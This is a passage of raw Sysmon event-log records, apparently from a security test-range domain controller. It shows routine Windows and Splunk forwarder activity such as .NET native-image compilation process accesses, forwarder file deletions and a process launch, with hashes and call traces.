Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3BF463F8BD4597DC37B81D4DA66D98DE,SHA256=01ABB6D9BAFA05ABDADA1CAB90B57D0B7642A4429E782FCF90BF81ECC0F356EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000076601Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:59.717{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EBF7-607E-D10D-00000000BB01}2704C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076600Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:59.701{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}2704C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076599Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:59.701{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{00000000-0000-0000-0000-000000000000}2704C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076598Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:59.654{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EBF7-607E-D00D-00000000BB01}4800C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076597Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:59.623{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}4800C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076596Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:59.623{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{00000000-0000-0000-0000-000000000000}4800C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000076595Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:59.576{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65E508499487627E7304588F5BB3C1D0,SHA256=663C46D8C4855C50BDBCE6557387ED4E3031E848B6497E6F2D0B4B8DD322993B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000076594Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:59.545{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EBF7-607E-CF0D-00000000BB01}5796C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076593Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:59.529{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076592Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:59.529{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076591Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:59.529{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076590Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:59.529{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000076589Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:59.389{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=89E1650D2B3D90FF46B47998E7360ACA,SHA256=7FA5FC0A01C7270B10CCA692E3CEFB77F92C98EF78CEA03A11208F7A43789D42,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000076588Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:59.389{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBF7-607E-CF0D-00000000BB01}5796C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076587Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:59.389{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF7-607E-CF0D-00000000BB01}5796C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076586Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:59.326{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EBF7-607E-CE0D-00000000BB01}1628C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076585Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:59.295{A7A01FEF-E380-607E-510A-00000000BB01}63405272C:\Windows\system32\conhost.exe{A7A01FEF-EBF7-607E-CC0D-00000000BB01}6724C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076584Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:59.295{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}1628C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076583Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:59.295{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{00000000-0000-0000-0000-000000000000}1628C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076582Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:59.279{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBF7-607E-CC0D-00000000BB01}6724C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076581Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:59.279{A7A01FEF-E37F-607E-4D0A-00000000BB01}59884344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{A7A01FEF-EBF7-607E-CC0D-00000000BB01}6724C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000076580Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:59.140{A7A01FEF-EBF7-607E-CC0D-00000000BB01}6724C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000076579Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:59.217{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EBF7-607E-CD0D-00000000BB01}5924C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076578Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:59.201{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}5924C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076577Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:59.201{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{00000000-0000-0000-0000-000000000000}5924C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000076576Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:59.123{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program 